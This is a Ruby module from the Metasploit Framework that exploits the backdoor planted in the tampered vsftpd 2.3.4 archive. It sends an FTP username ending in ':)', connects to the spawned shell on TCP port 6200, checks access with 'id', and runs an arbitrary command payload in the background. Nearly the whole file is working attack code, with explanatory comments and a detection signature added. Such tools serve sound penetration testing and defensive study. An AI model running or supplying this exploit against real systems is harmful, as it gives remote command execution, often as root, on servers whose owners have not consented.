rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the backdoor shipped in the tampered vsftpd-2.3.4.tar.gz
# archive (see 'Description' below). The module sends an FTP USER name ending
# in ":)" and then looks for a shell listening on TCP/6200; if one answers, the
# command payload is run over that connection.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata (name, description, references, payload constraints, the
  # single automatic target) plus the one option this module registers:
  # RPORT, the FTP control port, defaulting to 21.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',
        'Description' => %q{
          This module exploits a malicious backdoor that was added to the VSFTPD download
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
          June 30th 2011 and July 1st 2011 according to the most recent information
          available. This backdoor was removed on July 3rd 2011.
        },
        'Author' => [ 'hdm', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '73573'],
          [ 'URL', 'http://pastebin.com/AetT9sS5'],
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
        ],
        'Privileged' => true,
        'Platform' => [ 'unix' ],
        'Arch' => ARCH_CMD,
        # Command-string payload typed into the backdoor shell. The handler is
        # given the socket we already hold (see handle_backdoor), hence the
        # 'find' connection type and the interactive payload type.
        'Payload' => {
          'Space' => 2000,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
          {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2011-07-03',
        'DefaultTarget' => 0,
        # Reliability/stability/side-effect metadata was never assessed for
        # this module; all three are left at their UNKNOWN_* defaults.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(21) ])
  end

  # Triggers the backdoor and takes over the shell it spawns.
  #
  # Flow: (1) probe TCP/6200 in case a backdoor listener is already up;
  # (2) otherwise talk to the FTP service on RPORT, send a USER name ending in
  # ":)" followed by a PASS, and (3) probe TCP/6200 again. Any successful probe
  # is handed to handle_backdoor, which checks that it really is a shell
  # before running the payload.
  #
  # Detection note: the ":)" suffix on the FTP USER command, followed by a new
  # connection to TCP/6200 on the same host, is the observable signature of
  # this module.
  def exploit
    # connect(false, ...) opens a separate socket rather than replacing the
    # module's global `sock` (Tcp mixin semantics -- confirm against
    # Msf::Exploit::Remote::Tcp#connect). The `rescue nil` modifier swallows
    # *every* StandardError, not only a refused connection, so any transient
    # failure here is indistinguishable from "port closed".
    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
    if nsock
      print_status("The port used by the backdoor bind listener is already open")
      handle_backdoor(nsock)
      return
    end

    # Connect to the FTP service port first
    connect

    # Wait up to 30s for the greeting; get_once(-1, ...) returns whatever is
    # available, and nil on timeout (hence the to_s).
    banner = sock.get_once(-1, 30).to_s
    print_status("Banner: #{banner.strip}")

    # A 1-6 character random username carrying the ":)" suffix the backdoor
    # keys on.
    sock.put("USER #{rand_text_alphanumeric(rand(6) + 1)}:)\r\n")
    resp = sock.get_once(-1, 30).to_s
    print_status("USER: #{resp.strip}")

    # 530 = login refused. An anonymous-only server never reaches the
    # backdoored code path, so there is nothing more to try.
    if resp =~ /^530 /
      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
      disconnect
      return
    end

    # 331 = "user name okay, need password"; anything else is unexpected.
    if resp !~ /^331 /
      print_error("This server did not respond as expected: #{resp.strip}")
      disconnect
      return
    end

    sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n")

    # Do not bother reading the response from password, just try the backdoor
    # (same separate-socket / rescue-everything behaviour as the first probe).
    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
    if nsock
      print_good("Backdoor service has been spawned, handling...")
      handle_backdoor(nsock)
      return
    end

    # No listener appeared on TCP/6200: the target is not backdoored (or the
    # trigger did not take). Close the FTP control connection and give up.
    disconnect
  end

  # Verifies that the connection `s` is a command shell, then launches the
  # payload over it and hands the socket to the payload handler.
  #
  # @param s the socket returned by connect to TCP/6200
  def handle_backdoor(s)
    # Sanity check: a real shell answers `id` with "uid=..."; wait at most 5s.
    s.put("id\n")

    r = s.get_once(-1, 5).to_s
    if r !~ /uid=/
      print_error("The service on port 6200 does not appear to be a shell")
      disconnect(s)
      return
    end

    print_good("UID: #{r.strip}")

    # Run the encoded command payload detached from the shell (nohup) with its
    # output discarded, then let the handler take over the same socket.
    s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
    handler(s)
  end
end